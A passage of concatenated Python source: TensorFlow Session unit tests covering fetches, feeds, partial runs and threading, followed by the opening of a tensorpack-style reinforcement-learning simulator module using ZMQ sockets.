testFetchTensorObject(self): with session.Session() as s: a = constant_op.constant(1.0, shape=[1, 2]) b = constant_op.constant(2.0, shape=[2, 3]) c = math_ops.matmul(a, b) results_with_list = s.run([c]) self.assertAllEqual([[4.0, 4.0, 4.0]], results_with_list[0]) results_with_single = s.run(c) self.assertAllEqual([[4.0, 4.0, 4.0]], results_with_single) results_with_get = c.eval() self.assertAllEqual([[4.0, 4.0, 4.0]], results_with_get) a_val, b_val = s.run([a, b]) # Test multiple fetches. 
self.assertAllEqual([[1.0, 1.0]], a_val) self.assertAllEqual([[2.0, 2.0, 2.0], [2.0, 2.0, 2.0]], b_val) def testFetchScalar(self): with session.Session() as s: for scalar in np.int32, np.int64, np.float16, np.float32, np.float64: x = scalar(7) y = scalar(8) tf_x = constant_op.constant(x, shape=[]) tf_y = constant_op.constant(y) tf_xy = math_ops.add(tf_x, tf_y) # Single fetch xy = s.run(tf_xy) self.assertEqual(scalar, type(xy)) self.assertEqual(x + y, xy) # List fetch xy, = s.run([tf_xy]) self.assertEqual(scalar, type(xy)) self.assertEqual(x + y, xy) def testFetchOperationObject(self): with session.Session() as s: a = constant_op.constant(1.0, shape=[1, 2]) v = variables.Variable(a, name='testFetchOperationObject_v') s.run(v.initializer) v_val = s.run(v) self.assertAllEqual([[1.0, 1.0]], v_val) def testFetchSparseTensor(self): with session.Session() as s: indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64) values = np.array([1.0, 2.0]).astype(np.float32) shape = np.array([7, 9, 2]).astype(np.int64) sp = ops.SparseTensor( constant_op.constant(indices), constant_op.constant(values), constant_op.constant(shape)) # Single fetch, use as tuple sp_out = s.run(sp) indices_out, values_out, shape_out = sp_out self.assertAllEqual(indices_out, indices) self.assertAllEqual(values_out, values) self.assertAllEqual(shape_out, shape) # Single fetch, use as SparseTensorValue sp_out = s.run(sp) self.assertAllEqual(sp_out.indices, indices) self.assertAllEqual(sp_out.values, values) self.assertAllEqual(sp_out.shape, shape) # Tuple fetch, use as tuple indices_out, values_out, shape_out = s.run(sp) self.assertAllEqual(indices_out, indices) self.assertAllEqual(values_out, values) self.assertAllEqual(shape_out, shape) # List fetch, use as tuple (indices_out, values_out, shape_out), = s.run([sp]) self.assertAllEqual(indices_out, indices) self.assertAllEqual(values_out, values) self.assertAllEqual(shape_out, shape) # List fetch, use as SparseTensorValue sp_out, = s.run([sp]) self.assertAllEqual(sp_out.indices, indices) self.assertAllEqual(sp_out.values, values) self.assertAllEqual(sp_out.shape, shape) def testFeedSparseTensor(self): with session.Session() as s: indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64) values = np.array([1.0, 2.0]).astype(np.float32) shape = np.array([7, 9, 2]).astype(np.int64) sp = ops.SparseTensor( array_ops.placeholder(dtype=np.int64, shape=(2, 3)), array_ops.placeholder(dtype=np.float32, shape=(2,)), array_ops.placeholder(dtype=np.int64, shape=(3,)),) sp_indices = array_ops.identity(sp.indices) sp_values = array_ops.identity(sp.values) sp_shape = array_ops.identity(sp.shape) sp2 = ops.SparseTensor(sp_indices, sp_values, sp_shape) # Feed with tuple indices_out, values_out, shape_out = s.run( [sp_indices, sp_values, sp_shape], {sp: (indices, values, shape)}) self.assertAllEqual(indices_out, indices) self.assertAllEqual(values_out, values) self.assertAllEqual(shape_out, shape) # Feed with SparseTensorValue indices_out, values_out, shape_out = s.run( [sp_indices, sp_values, sp_shape], {sp: ops.SparseTensorValue(indices, values, shape)}) self.assertAllEqual(indices_out, indices) self.assertAllEqual(values_out, values) self.assertAllEqual(shape_out, shape) # Feed with SparseTensorValue, fetch SparseTensorValue sp2_out = s.run(sp2, {sp: ops.SparseTensorValue(indices, values, shape)}) self.assertAllEqual(sp2_out.indices, indices) self.assertAllEqual(sp2_out.values, values) self.assertAllEqual(sp2_out.shape, shape) def testFetchIndexedSlices(self): with session.Session() as s: 
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64) values = np.array([1.0, 2.0]).astype(np.float32) dense_shape = np.array([7, 9, 2]).astype(np.int64) ind = ops.IndexedSlices( constant_op.constant(values), constant_op.constant(indices), constant_op.constant(dense_shape)) # Single fetch, use as tuple ind_out = s.run(ind) values_out, indices_out, dense_shape_out = ind_out self.assertAllEqual(values_out, values) self.assertAllEqual(indices_out, indices) self.assertAllEqual(dense_shape_out, dense_shape) # Single fetch, use as IndexedSlicesValue ind_out = s.run(ind) self.assertAllEqual(ind_out.values, values) self.assertAllEqual(ind_out.indices, indices) self.assertAllEqual(ind_out.dense_shape, dense_shape) # Tuple fetch, use as tuple values_out, indices_out, dense_shape_out = s.run(ind) self.assertAllEqual(values_out, values) self.assertAllEqual(indices_out, indices) self.assertAllEqual(dense_shape_out, dense_shape) # List fetch, use as tuple (values_out, indices_out, dense_shape_out), = s.run([ind]) self.assertAllEqual(values_out, values) self.assertAllEqual(indices_out, indices) self.assertAllEqual(dense_shape_out, dense_shape) # List fetch, use as IndexedSlicesValue ind_out, = s.run([ind]) self.assertAllEqual(ind_out.values, values) self.assertAllEqual(ind_out.indices, indices) self.assertAllEqual(ind_out.dense_shape, dense_shape) def testFeedIndexedSlices(self): with session.Session() as s: values = np.array([1.0, 2.0]).astype(np.float32) indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64) dense_shape = np.array([7, 9, 2]).astype(np.int64) ind = ops.IndexedSlices( array_ops.placeholder(dtype=np.float32, shape=(2,)), array_ops.placeholder(dtype=np.int64, shape=(2, 3)), array_ops.placeholder(dtype=np.int64, shape=(3,)),) ind_values = array_ops.identity(ind.values) ind_indices = array_ops.identity(ind.indices) ind_dense_shape = array_ops.identity(ind.dense_shape) ind2 = ops.IndexedSlices(ind_values, ind_indices, ind_dense_shape) # Feed with tuple values_out, indices_out, dense_shape_out = s.run( [ind_values, ind_indices, ind_dense_shape], {ind: (values, indices, dense_shape)}) self.assertAllEqual(values_out, values) self.assertAllEqual(indices_out, indices) self.assertAllEqual(dense_shape_out, dense_shape) # Feed with IndexedSlicesValue values_out, indices_out, dense_shape_out = s.run( [ind_values, ind_indices, ind_dense_shape], {ind: ops.IndexedSlicesValue(values, indices, dense_shape)}) self.assertAllEqual(values_out, values) self.assertAllEqual(indices_out, indices) self.assertAllEqual(dense_shape_out, dense_shape) # Feed with IndexedSlicesValue, fetch IndexedSlicesValue ind2_out = s.run(ind2, {ind: ops.IndexedSlicesValue(values, indices, dense_shape)}) self.assertAllEqual(ind2_out.values, values) self.assertAllEqual(ind2_out.indices, indices) self.assertAllEqual(ind2_out.dense_shape, dense_shape) def testFetchIndexedSlicesWithoutDenseShape(self): with session.Session() as s: indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64) values = np.array([1.0, 2.0]).astype(np.float32) dense_shape = None ind = ops.IndexedSlices( constant_op.constant(values), constant_op.constant(indices), None) # Single fetch, use as tuple ind_out = s.run(ind) values_out, indices_out, dense_shape_out = ind_out self.assertAllEqual(values_out, values) self.assertAllEqual(indices_out, indices) self.assertAllEqual(dense_shape_out, dense_shape) # Single fetch, use as IndexedSlicesValue ind_out = s.run(ind) self.assertAllEqual(ind_out.values, values) self.assertAllEqual(ind_out.indices, indices) 
self.assertAllEqual(ind_out.dense_shape, dense_shape) # Tuple fetch, use as tuple values_out, indices_out, dense_shape_out = s.run(ind) self.assertAllEqual(values_out, values) self.assertAllEqual(indices_out, indices) self.assertAllEqual(dense_shape_out, dense_shape) # List fetch, use as tuple (values_out, indices_out, dense_shape_out), = s.run([ind]) self.assertAllEqual(values_out, values) self.assertAllEqual(indices_out, indices) self.assertAllEqual(dense_shape_out, dense_shape) # List fetch, use as IndexedSlicesValue ind_out, = s.run([ind]) self.assertAllEqual(ind_out.values, values) self.assertAllEqual(ind_out.indices, indices) self.assertAllEqual(ind_out.dense_shape, dense_shape) def testFeedIndexedSlicesWithoutDenseShape(self): with session.Session() as s: values = np.array([1.0, 2.0]).astype(np.float32) indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64) dense_shape = None ind = ops.IndexedSlices( array_ops.placeholder(dtype=np.float32, shape=(2,)), array_ops.placeholder(dtype=np.int64, shape=(2, 3)), None) ind_values = array_ops.identity(ind.values) ind_indices = array_ops.identity(ind.indices) ind2 = ops.IndexedSlices(ind_values, ind_indices) # Feed with tuple values_out, indices_out = s.run( [ind_values, ind_indices], {ind: (values, indices)}) self.assertAllEqual(values_out, values) self.assertAllEqual(indices_out, indices) # Feed with IndexedSlicesValue values_out, indices_out = s.run( [ind_values, ind_indices], {ind: ops.IndexedSlicesValue(values, indices, dense_shape)}) self.assertAllEqual(values_out, values) self.assertAllEqual(indices_out, indices) # Feed with IndexedSlicesValue, fetch IndexedSlicesValue ind2_out = s.run(ind2, {ind: ops.IndexedSlicesValue(values, indices, dense_shape)}) self.assertAllEqual(ind2_out.values, values) self.assertAllEqual(ind2_out.indices, indices) self.assertAllEqual(ind2_out.dense_shape, dense_shape) def testExtendWithStatelessOperations(self): with session.Session() as s: a = constant_op.constant(1.0, shape=[1, 2]) b = constant_op.constant(2.0, shape=[2, 3]) c = math_ops.matmul(a, b) c_val = s.run(c) self.assertAllEqual([[4.0, 4.0, 4.0]], c_val) d = constant_op.constant([1.0, 2.0, 3.0], shape=[3, 1]) e = math_ops.matmul(c, d) # Extend will happen here. e_val = s.run(e) self.assertAllEqual([[24.0]], e_val) def testExtendWithStatefulOperations(self): with session.Session() as s: a = constant_op.constant(1.0, shape=[1, 2]) b = constant_op.constant(2.0, shape=[2, 3]) c = math_ops.matmul(a, b) v = variables.Variable(c, name='testExtendWithStatefulOperations_v') v.initializer.run() v_val = v.eval() self.assertAllEqual([[4.0, 4.0, 4.0]], v_val) d = constant_op.constant(3.0, shape=[2, 3]) e = math_ops.matmul(a, d) assign_e_to_v = state_ops.assign(v, e) # Extend will happen here. e_val = e.eval() self.assertAllEqual([[6.0, 6.0, 6.0]], e_val) v_val = v.eval() self.assertAllEqual([[4.0, 4.0, 4.0]], v_val) s.run(assign_e_to_v) v_val = v.eval() self.assertAllEqual([[6.0, 6.0, 6.0]], v_val) def testExtendWithGroupBy(self): with session.Session() as s: a = constant_op.constant(1.0, shape=[1, 2]) p = variables.Variable(a, name='testExtendWithGroupBy_p') a_val = a.eval() # Force an Extend after this op. self.assertAllEqual([[1.0, 1.0]], a_val) b = constant_op.constant(2.0, shape=[1, 2]) q = variables.Variable(b, name='testExtendWithGroupBy_q') # Extend will happen here. 
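      # (Added note: "Extend" here means that nodes added to the graph after the previous
      # Session.run call are shipped to the session the next time run() is invoked.)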
init = control_flow_ops.group(p.initializer, q.initializer) s.run(init) p_val, q_val = s.run([p, q]) self.assertAllEqual([[1.0, 1.0]], p_val) self.assertAllEqual([[2.0, 2.0]], q_val) def testTensorGetMethod(self): with session.Session(): a = constant_op.constant(1.0, shape=[1, 2]) b = constant_op.constant(2.0, shape=[2, 3]) c = math_ops.matmul(a, b) c_val = c.eval() self.assertAllEqual([[4.0, 4.0, 4.0]], c_val) fed_c_val = c.eval(feed_dict={a.name: [[4.0, 4.0]]}) self.assertAllEqual([[16.0, 16.0, 16.0]], fed_c_val) def testOperationRunMethod(self): with session.Session(): a = constant_op.constant(1.0, shape=[1, 2]) b = constant_op.constant(2.0, shape=[1, 2], name='b') v = variables.Variable(a, a.dtype) assign_a_to_v = state_ops.assign(v, a) assign_a_to_v.eval() v_val = v.eval() self.assertAllEqual([[1.0, 1.0]], v_val) assign_b_to_v = state_ops.assign(v, b) assign_b_to_v.eval() v_val = v.eval() self.assertAllEqual([[2.0, 2.0]], v_val) assign_b_to_v.eval(feed_dict={'b:0': [[3.0, 3.0]]}) v_val = v.eval() self.assertAllEqual([[3.0, 3.0]], v_val) def testDefaultGraph(self): with session.Session() as s: self.assertEqual(ops.get_default_graph(), s.graph) a = constant_op.constant(1.0, shape=[1, 2]) b = constant_op.constant(2.0, shape=[2, 3]) self.assertEqual(ops.get_default_graph(), a.graph) self.assertEqual(ops.get_default_graph(), b.graph) c = math_ops.matmul(a, b) v = variables.Variable(c, name='testDefaultGraph_v') v.initializer.run() v_val = v.eval() self.assertAllEqual([[4.0, 4.0, 4.0]], v_val) d = constant_op.constant(3.0, shape=[2, 3]) e = math_ops.matmul(a, d) assign_e_to_v = state_ops.assign(v, e) e_val = e.eval() self.assertAllEqual([[6.0, 6.0, 6.0]], e_val) v_val = v.eval() self.assertAllEqual([[4.0, 4.0, 4.0]], v_val) s.run(assign_e_to_v) v_val = v.eval() self.assertAllEqual([[6.0, 6.0, 6.0]], v_val) self.assertEqual(ops.get_default_graph(), s.graph) def _testDefaultGraphInThread(self, constructed_event, continue_event, i): with session.Session() as s: self.assertEqual(ops.get_default_graph(), s.graph) a = constant_op.constant(1.0, shape=[1, 2]) b = constant_op.constant(2.0, shape=[2, 3]) c = math_ops.matmul(a, b) v = variables.Variable(c, name='var_%d' % i) # Block here until all threads have constructed their graph. constructed_event.set() continue_event.wait() assign_c_to_v = state_ops.assign(v, c) v.initializer.run() assign_c_to_v.eval() v_val = v.eval() self.assertAllEqual([[4.0, 4.0, 4.0]], v_val) d = constant_op.constant(3.0, shape=[2, 3]) e = math_ops.matmul(a, d) assign_e_to_v = state_ops.assign(v, e) e_val = e.eval() self.assertAllEqual([[6.0, 6.0, 6.0]], e_val) v_val = v.eval() self.assertAllEqual([[4.0, 4.0, 4.0]], v_val) s.run(assign_e_to_v) v_val = v.eval() self.assertAllEqual([[6.0, 6.0, 6.0]], v_val) self.assertEqual(ops.get_default_graph(), s.graph) def testDefaultGraphWithThreads(self): # Fork ten threads that use their thread-local default graph. 
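    # (Added note: each thread builds its graph inside its own Session context; the
    # constructed/continue events below make every thread finish graph construction
    # before any of them proceeds, exercising the thread-local default-graph stack.)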
threads = [] constructed_events = [threading.Event() for _ in range(10)] continue_event = threading.Event() for i, constructed_event in enumerate(constructed_events): t = self.checkedThread(target=self._testDefaultGraphInThread, args=(constructed_event, continue_event, i)) threads.append(t) for t in threads: t.start() for constructed_event in constructed_events: constructed_event.wait() continue_event.set() for t in threads: t.join() def testParallelRun(self): with session.Session() as sess: c = constant_op.constant(5.0) ev = threading.Event() def run_step(): ev.wait() val = c.eval(session=sess) self.assertEqual(val, 5.0) threads = [self.checkedThread(target=run_step) for _ in range(100)] for t in threads: t.start() ev.set() for t in threads: t.join() def testRunFeedDict(self): with session.Session() as s: x = array_ops.zeros([2]) y = s.run(2 * x, feed_dict={x: np.ones(2).astype(np.float32)}) self.assertAllEqual(y, 2 * np.ones(2)) y = s.run(2 * x, feed_dict={x.name: np.ones(2).astype(np.float32)}) self.assertAllEqual(y, 2 * np.ones(2)) y = s.run(2 * x, feed_dict={x: [1, 1]}) assert (y == 2 * np.ones(2)).all() def testGraphDef(self): with session.Session() as sess: self.assertProtoEquals( 'versions { producer: %d min_consumer: %d }' % ( versions.GRAPH_DEF_VERSION, versions.GRAPH_DEF_VERSION_MIN_CONSUMER), sess.graph_def) c = constant_op.constant(5.0, name='c') self.assertEquals(len(sess.graph_def.node), 1) d = constant_op.constant(6.0, name='d') self.assertEquals(len(sess.graph_def.node), 2) self.assertAllEqual(c.eval(), 5.0) self.assertAllEqual(d.eval(), 6.0) e = constant_op.constant(7.0, name='e') self.assertEquals(len(sess.graph_def.node), 3) self.assertAllEqual(e.eval(), 7.0) def testUseAfterClose(self): with session.Session() as sess: c = constant_op.constant(5.0) self.assertAllEqual(sess.run(c), 5.0) with self.assertRaisesWithPredicateMatch( RuntimeError, lambda e: 'Attempted to use a closed Session.' in str(e)): sess.run(c) def testUseAfterCloseConcurrent(self): with session.Session() as sess: c = constant_op.constant(5.0) self.assertAllEqual(sess.run(c), 5.0) def update_thread(): with self.assertRaisesWithPredicateMatch( RuntimeError, lambda e: 'Attempted to use a closed Session.' in str(e)): while True: sess.run(c) t = threading.Thread(target=update_thread) t.start() time.sleep(0.1) sess.close() t.join() def testUseEmptyGraph(self): with session.Session() as sess: with self.assertRaisesWithPredicateMatch( RuntimeError, lambda e: 'The Session graph is empty.' in str(e)): sess.run([]) def testNotEntered(self): # pylint: disable=protected-access self.assertEqual(ops._default_session_stack.get_default(), None) # pylint: enable=protected-access with ops.device('/cpu:0'): sess = session.Session() c_1 = constant_op.constant(5.0) with sess.graph.as_default(): c_2 = constant_op.constant(5.0) self.assertEqual(c_1.graph, c_2.graph) self.assertEqual(sess.run(c_2), 5.0) with self.assertRaisesWithPredicateMatch( ValueError, lambda e: 'No default session is registered.' 
in str(e)): c_2.eval() def testInteractive(self): with ops.device('/cpu:0'): sess = session.InteractiveSession() a = constant_op.constant(1.0, shape=[1, 2]) b = constant_op.constant(2.0, shape=[2, 3]) c = math_ops.matmul(a, b) self.assertAllEqual([[4.0, 4.0, 4.0]], c.eval()) d = constant_op.constant([1.0, 2.0, 3.0], shape=[3, 1]) e = math_ops.matmul(c, d) self.assertAllEqual([[24.0]], e.eval()) sess.close() def testSharedGraph(self): with ops.Graph().as_default() as g, ops.device('/cpu:0'): a = constant_op.constant(1.0, shape=[1, 2]) b = constant_op.constant(2.0, shape=[2, 3]) c = math_ops.matmul(a, b) with session.Session(graph=g) as sess1: with session.Session(graph=g) as sess2: self.assertAllEqual(sess1.run(c), sess2.run(c)) def testDuplicatedInputs(self): with session.Session() as sess: a = constant_op.constant(1.0, shape=[1, 2]) b = constant_op.constant(2.0, shape=[1, 3]) a_val, b_val, a2_val = sess.run([a, b, a]) self.assertAllEqual(a_val, [[1.0, 1.0]]) self.assertAllEqual(b_val, [[2.0, 2.0, 2.0]]) self.assertAllEqual(a2_val, [[1.0, 1.0]]) def testFeedAndFetch(self): with session.Session(): for dtype in [dtypes.float16, dtypes.float32, dtypes.float64, dtypes.int32, dtypes.uint8, dtypes.int16, dtypes.int8, dtypes.int64, dtypes.bool, dtypes.complex64, dtypes.complex128]: for shape in [(32, 4, 128), (37,), (2, 0, 6), (0, 0, 0)]: np_dtype = dtype.as_numpy_dtype feed_t = array_ops.placeholder(dtype=dtype, shape=shape) out_t = array_ops.identity(feed_t) np_array = np.random.randint(-10, 10, shape) if dtype == dtypes.bool: np_array = np_array > 0 elif dtype == dtypes.complex64: np_array = np.sqrt(np_array.astype(np_dtype)) elif dtype == dtypes.complex64: np_array = np.sqrt(np_array.astype(np_dtype)) else: np_array = np_array.astype(np_dtype) self.assertAllEqual(np_array, out_t.eval(feed_dict={feed_t: np_array})) def testFeedError(self): with session.Session() as sess: feed_t = array_ops.placeholder(dtype=dtypes.float32) out_t = array_ops.identity(feed_t) feed_val = constant_op.constant(5.0) with self.assertRaisesRegexp(TypeError, 'cannot be a tf.Tensor object'): sess.run(out_t, feed_dict={feed_t: feed_val}) with self.assertRaisesRegexp(TypeError, 'cannot be a tf.Tensor object'): out_t.eval(feed_dict={feed_t: feed_val}) with self.assertRaisesRegexp(TypeError, 'cannot be a tf.Tensor object'): out_t.op.run(feed_dict={feed_t: feed_val}) def testStringFetch(self): with session.Session(): for shape in [(32, 4, 128), (37,), (2, 0, 6), (0, 0, 0)]: size = 1 for s in shape: size *= s c_list = np.array([compat.as_bytes(str(i)) for i in xrange(size)], dtype=np.object).reshape(shape) if size > 0 else [] c = constant_op.constant(c_list) self.assertAllEqual(c.eval(), c_list) def testStringFeed(self): with session.Session(): for shape in [(32, 4, 128), (37,), (2, 0, 6), (0, 0, 0)]: size = 1 for s in shape: size *= s c_list = np.array([compat.as_bytes(str(i)) for i in xrange(size)], dtype=np.object).reshape(shape) feed_t = array_ops.placeholder(dtype=dtypes.string, shape=shape) c = array_ops.identity(feed_t) self.assertAllEqual(c.eval(feed_dict={feed_t: c_list}), c_list) def testStringFeedWithNullCharacters(self): with session.Session(): c_list = [b'\n\x01\x00', b'\n\x00\x01'] feed_t = array_ops.placeholder(dtype=dtypes.string, shape=[2]) c = array_ops.identity(feed_t) out = c.eval(feed_dict={feed_t: c_list}) self.assertEqual(c_list[0], out[0]) self.assertEqual(c_list[1], out[1]) def testStringFeedWithUnicode(self): with session.Session(): c_list = [u'\n\x01\x00', u'\n\x00\x01'] feed_t = 
array_ops.placeholder(dtype=dtypes.string, shape=[2]) c = array_ops.identity(feed_t) out = c.eval(feed_dict={feed_t: c_list}) self.assertEqual(c_list[0], out[0].decode('utf-8')) self.assertEqual(c_list[1], out[1].decode('utf-8')) out = c.eval(feed_dict={feed_t: np.array(c_list, dtype=np.object)}) self.assertEqual(c_list[0], out[0].decode('utf-8')) self.assertEqual(c_list[1], out[1].decode('utf-8')) def testInvalidTargetFails(self): with self.assertRaisesRegexp( RuntimeError, 'No session factory registered for the given session options.'): session.Session('INVALID_TARGET') def testFetchByNameDifferentStringTypes(self): with session.Session() as sess: c = constant_op.constant(42.0, name='c') d = constant_op.constant(43.0, name=u'd') e = constant_op.constant(44.0, name=b'e') f = constant_op.constant(45.0, name=r'f') self.assertTrue(isinstance(c.name, six.text_type)) self.assertTrue(isinstance(d.name, six.text_type)) self.assertTrue(isinstance(e.name, six.text_type)) self.assertTrue(isinstance(f.name, six.text_type)) self.assertEqual(42.0, sess.run('c:0')) self.assertEqual(42.0, sess.run(u'c:0')) self.assertEqual(42.0, sess.run(b'c:0')) self.assertEqual(42.0, sess.run(r'c:0')) self.assertEqual(43.0, sess.run('d:0')) self.assertEqual(43.0, sess.run(u'd:0')) self.assertEqual(43.0, sess.run(b'd:0')) self.assertEqual(43.0, sess.run(r'd:0')) self.assertEqual(44.0, sess.run('e:0')) self.assertEqual(44.0, sess.run(u'e:0')) self.assertEqual(44.0, sess.run(b'e:0')) self.assertEqual(44.0, sess.run(r'e:0')) self.assertEqual(45.0, sess.run('f:0')) self.assertEqual(45.0, sess.run(u'f:0')) self.assertEqual(45.0, sess.run(b'f:0')) self.assertEqual(45.0, sess.run(r'f:0')) def testIncorrectGraph(self): with ops.Graph().as_default() as g_1: c_1 = constant_op.constant(1.0, name='c') with ops.Graph().as_default() as g_2: c_2 = constant_op.constant(2.0, name='c') self.assertEqual('c', c_1.op.name) self.assertEqual('c', c_2.op.name) with session.Session(graph=g_1) as sess_1: self.assertEqual(1.0, sess_1.run(c_1)) with self.assertRaises(ValueError): sess_1.run(c_2) with self.assertRaises(ValueError): sess_1.run(c_2.op) with session.Session(graph=g_2) as sess_2: with self.assertRaises(ValueError): sess_2.run(c_1) with self.assertRaises(ValueError): sess_2.run(c_1.op) self.assertEqual(2.0, sess_2.run(c_2)) def testPartialRun(self): with session.Session() as sess: a = array_ops.placeholder(dtypes.float32, shape=[]) b = array_ops.placeholder(dtypes.float32, shape=[]) c = array_ops.placeholder(dtypes.float32, shape=[]) r1 = math_ops.add(a, b) r2 = math_ops.mul(r1, c) h = sess.partial_run_setup([r1, r2], [a, b, c]) res = sess.partial_run(h, r1, feed_dict={a: 1, b: 2}) self.assertEqual(3, res) temp = res * 17 res = sess.partial_run(h, r2, feed_dict={c: temp}) self.assertEqual(153, res) # Call again on the same graph. 
h2 = sess.partial_run_setup([r1, r2], [a, b, c]) res = sess.partial_run(h2, r1, feed_dict={a: 1, b: 2}) self.assertEqual(3, res) temp = res * 18 res = sess.partial_run(h2, r2, feed_dict={c: temp}) self.assertEqual(162, res) def testPartialRunIncomplete(self): with session.Session() as sess: a = array_ops.placeholder(dtypes.float32, shape=[]) b = array_ops.placeholder(dtypes.float32, shape=[]) c = array_ops.placeholder(dtypes.float32, shape=[]) r1 = math_ops.add(a, b) r2 = math_ops.mul(r1, c) h = sess.partial_run_setup([r1, r2], [a, b, c]) res = sess.partial_run(h, r1, feed_dict={a: 1, b: 2}) self.assertEqual(3, res) def testConcurrentPartialRun(self): with session.Session() as sess: a = array_ops.placeholder(dtypes.float32, shape=[]) b = array_ops.placeholder(dtypes.float32, shape=[]) c = array_ops.placeholder(dtypes.float32, shape=[]) r1 = math_ops.add(a, b) r2 = math_ops.mul(r1, c) h1 = sess.partial_run_setup([r1], [a, b, c]) h2 = sess.partial_run_setup([r1, r2], [a, b, c]) res = sess.partial_run(h1, r1, feed_dict={a: 1, b: 2}) self.assertEqual(3, res) temp = res * 19 res = sess.partial_run(h2, r1, feed_dict={a: temp, b: 9}) self.assertEqual(66, res) res = sess.partial_run(h2, r2, feed_dict={c: 7}) self.assertEqual(462, res) def testManyPartialRun(self): with session.Session() as sess: steps = 200 inputs = [] outputs = [] a = constant_op.constant(2.0, dtypes.float32) for i in xrange(steps): inputs.append(array_ops.placeholder(dtypes.float32, shape=[])) a = math_ops.mul(a, inputs[i]) outputs.append(a) h = sess.partial_run_setup(outputs, inputs) for i in xrange(steps): res = sess.partial_run(h, outputs[i], feed_dict={inputs[i]: 1.0}) self.assertEqual(2.0, res) feed_dict = {} for i in xrange(steps): feed_dict[inputs[i]] = 1.0 res = sess.run(outputs, feed_dict) self.assertEqual(steps, len(res)) self.assertEqual(2.0, res[-1]) def testFeedDictKeyException(self): with session.Session() as sess: a = constant_op.constant(1.0, dtypes.float32, name='a') with self.assertRaisesRegexp(TypeError, "Cannot interpret feed_dict"): sess.run(a, feed_dict={'a': [2.0]}) def testPerStepTrace(self): run_options = config_pb2.RunOptions( trace_level=config_pb2.RunOptions.FULL_TRACE) run_metadata = config_pb2.RunMetadata() with ops.device('/cpu:0'): with session.Session() as sess: sess.run(constant_op.constant(1.0)) self.assertTrue(not run_metadata.HasField('step_stats')) sess.run(constant_op.constant(1.0), run_metadata=run_metadata) self.assertTrue(not run_metadata.HasField('step_stats')) sess.run(constant_op.constant(1.0), options=run_options, run_metadata=run_metadata) self.assertTrue(run_metadata.HasField('step_stats')) self.assertEquals(len(run_metadata.step_stats.dev_stats), 1) def testRunOptionsRunMetadata(self): run_options = config_pb2.RunOptions( trace_level=config_pb2.RunOptions.FULL_TRACE) run_metadata = config_pb2.RunMetadata() with ops.device('/cpu:0'): with session.Session() as sess: # all combinations are valid sess.run(constant_op.constant(1.0), options=None, run_metadata=None) sess.run(constant_op.constant(1.0), options=None, run_metadata=run_metadata) self.assertTrue(not run_metadata.HasField('step_stats')) sess.run(constant_op.constant(1.0), options=run_options, run_metadata=None) self.assertTrue(not run_metadata.HasField('step_stats')) sess.run(constant_op.constant(1.0), options=run_options, run_metadata=run_metadata) self.assertTrue(run_metadata.HasField('step_stats')) self.assertEquals(len(run_metadata.step_stats.dev_stats), 1) def testFeedShapeCompatibility(self): with session.Session() as 
sess: some_tensor = constant_op.constant([2.0, 2.0, 2.0, 2.0]) new_shape = constant_op.constant([2, 2]) reshaped_tensor = array_ops.reshape(some_tensor, new_shape) with self.assertRaisesRegexp(ValueError, 'Cannot feed value of shape'): sess.run(reshaped_tensor, feed_dict={some_tensor: [1.0, 2.0, 3.0]}) with self.assertRaisesRegexp(ValueError, 'may not be fed'): sess.run(reshaped_tensor, feed_dict={new_shape: [3, 7]}) def testRunWithNoTargetsIsAnError(self): with session.Session() as sess: _ = constant_op.constant(5.0) with self.assertRaisesRegexp( errors.InvalidArgumentError, 'Must specify at least one target to fetch or execute.'): sess.run([]) if __name__ == '__main__': googletest.main()
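# A minimal standalone sketch (illustrative only, not part of the test suite)
# of the two-phase partial_run workflow exercised by testPartialRun above,
# written against the public tf.compat.v1 API instead of the test framework's
# internal module aliases. It assumes a TensorFlow build that still exposes
# Session.partial_run_setup / Session.partial_run; the graph and feed values
# mirror the test.
import tensorflow.compat.v1 as tf

tf.disable_eager_execution()

a = tf.placeholder(tf.float32, shape=[])
b = tf.placeholder(tf.float32, shape=[])
c = tf.placeholder(tf.float32, shape=[])
r1 = tf.add(a, b)
r2 = tf.multiply(r1, c)

with tf.Session() as sess:
    # Declare up front every fetch and feed the handle may use.
    h = sess.partial_run_setup([r1, r2], [a, b, c])
    # Step 1: feed a and b, fetch the intermediate result r1.
    res = sess.partial_run(h, r1, feed_dict={a: 1, b: 2})    # -> 3.0
    # Step 2: feed c (derived from the first result), fetch r2.
    res = sess.partial_run(h, r2, feed_dict={c: res * 17})   # -> 153.0
    print(res)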
simulator.py
#!/usr/bin/env python2 # -*- coding: utf-8 -*- # File: simulator.py # Author: Yuxin Wu <ppwwyyxxc@gmail.com> import sys import os import signal import time import tensorflow as tf import multiprocessing as mp import time import threading import weakref from abc import abstractmethod, ABCMeta from collections import defaultdict, namedtuple import numpy as np import six from six.moves import queue from ..models._common import disable_layer_logging from ..callbacks import Callback from ..tfutils.varmanip import SessionUpdate from ..predict import OfflinePredictor from ..utils import logger from ..utils.timer import * from ..utils.serialize import * from ..utils.concurrency import * __all__ = ['SimulatorProcess', 'SimulatorMaster', 'SimulatorProcessStateExchange', 'SimulatorProcessSharedWeight', 'TransitionExperience', 'WeightSync'] try: import zmq except ImportError: logger.warn("Error in 'import zmq'. RL simulator won't be available.") __all__ = [] class TransitionExperience(object): """ A transition of state, or experience""" def __init__(self, state, action, reward, **kwargs): """ kwargs: whatever other attribute you want to save""" self.state = state self.action = action self.reward = reward for k, v in six.iteritems(kwargs): setattr(self, k, v) class SimulatorProcessBase(mp.Process): __metaclass__ = ABCMeta def __init__(self, idx): super(SimulatorProcessBase, self).__init__() self.idx = int(idx) self.identity = u'simulator-{}'.format(self.idx).encode('utf-8') @abstractmethod def _build_player(self): pass class SimulatorProcessStateExchange(SimulatorProcessBase): """ A process that simulates a player and communicates to master to send states and receive the next action """ __metaclass__ = ABCMeta def __init__(self, idx, pipe_c2s, pipe_s2c): """ :param idx: idx of this process """ super(SimulatorProcessStateExchange, self).__init__(idx) self.c2s = pipe_c2s self.s2c = pipe_s2c def run(self): player = self._build_player() context = zmq.Context() c2s_socket = context.socket(zmq.PUSH) c2s_socket.setsockopt(zmq.IDENTITY, self.identity) c2s_socket.set_hwm(2) c2s_socket.connect(self.c2s) s2c_socket = context.socket(zmq.DEALER) s2c_socket.setsockopt(zmq.IDENTITY, self.identity) #s2c_socket.set_hwm(5) s2c_socket.connect(self.s2c) 